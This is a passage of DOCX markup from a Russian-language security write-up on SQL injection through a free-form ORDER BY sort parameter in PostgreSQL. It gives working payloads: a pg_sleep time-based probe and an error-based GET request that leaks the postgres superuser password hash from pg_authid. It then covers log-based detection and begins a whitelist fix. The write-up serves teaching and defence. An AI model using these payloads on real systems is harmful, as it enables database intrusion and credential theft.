          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              THEN pg_sleep(5)::text ELSE '' END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B0FA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>для каждой row, попадающей в sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если orders содержит N rows, total delay = 5*N секунд. Атакующий выбирает endpoint с малым кол-вом rows (или добавляет LIMIT 1 через subquery в WHERE), чтобы time-delta была наблюдаемой (5–10 секунд для confirmation, без timeout от reverse-proxy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64007C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — error-based через type-coercion в ORDER BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19738332" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /reports/orders?sort_expr=(SELECT%20CAST(rolpassword%20AS%20int)%20FROM%20pg_authid%20WHERE%20rolname='postgres')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7CC916" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B4C79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (SELECT CAST(rolpassword AS int) FROM pg_authid WHERE rolname='postgres')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1A4FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это MD5/SCRAM hash, конвертация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73532818" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid input syntax for type integer: "SCRAM-SHA-256$4096:..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583604AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP-500 с полным password-hash в error message. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2-канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (error-based via CAST), использующий ORDER BY как точку входа. Эффективнее чем boolean-blind: один запрос даёт полный hash вместо побитного extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E2050" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — boolean-blind extraction любого данного, доступного для SELECT (rolpassword только для superuser; обычные таблицы для application-роли). Variant B — confirmation injection через time-channel (видимая в логах). Variant C — error-based instant extraction. ORDER BY-канал особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP-200 с rows возвращается всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приложение «отвечает корректно», только порядок rows другой. Без log-инспекции на client-side это незаметно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A7122" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA2F78D"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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (... pg_sleep ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нетипичные expression в ORDER BY от endpoint, где должен быть простой sort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF99A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_duration_statement = 1000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY ... pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — длительность будет существенно выше нормы, легко обнаружить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B6E681" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_expr=</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN</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pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB58AE0"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ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полный expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который вычисляется для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>каждой row</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед sorting. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>): *"Each sort_expression can be the name or ordinal number of an output column, or it can be an arbitrary expression formed from input-column values."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789D8D10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Семантика «expression per row» означает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F399FEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в expression выполняется один раз (если non-correlated) или для каждой row (если correlated с outer query). Boolean conditions через CASE работают как row-level boolean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8ACA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Side-effects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разрешены (pg_sleep, COPY TO PROGRAM в подзапросе), несмотря на то что ORDER BY концептуально pure. PostgreSQL не enforces purity — это намеренно (extension functions могут иметь side-effects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C43192" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Type errors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в expression падают как regular errors (SQLSTATE 22P02) — текст ошибки содержит исходное значение, попавшее в CAST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEA327" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сочетание этих фактов даёт три независимых канала:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5E56A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Boolean-channel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN cond THEN colA ELSE colB END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sorting по разным колонкам меняет order rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672EC99B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-channel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в expression — total delay = N*rows × delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F91EB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-channel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через type-coercion subquery — error message содержит leaked value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B4EE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не bug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL — это standard SQL expression semantics. Защита — application-level: ORDER BY-spec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не должна приходить от пользователя в free-form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Корректный pattern — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decompose sort-spec на column+direction tokens, validate каждый, build expression server-side</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEF59F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511985A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from typing import List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E6206" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D37C43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52E863" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class OrderColumn(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9F3D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    created_at = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC125D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount = "amount"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B594769" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status = "status"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1567E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3EE952" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/reports/orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89CCD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108392EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: List[str] = Query(["created_at:desc"]),  # формат "col:dir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A81A2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26007A1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58FDCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    columns = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D90D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for spec in sort:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437978C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ":" not in spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261AE50D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1E223" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        col_name, direction = spec.split(":", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD3E51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC8EF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            col_enum = OrderColumn(col_name)</w:t>
      </w:r>
    </w:p>
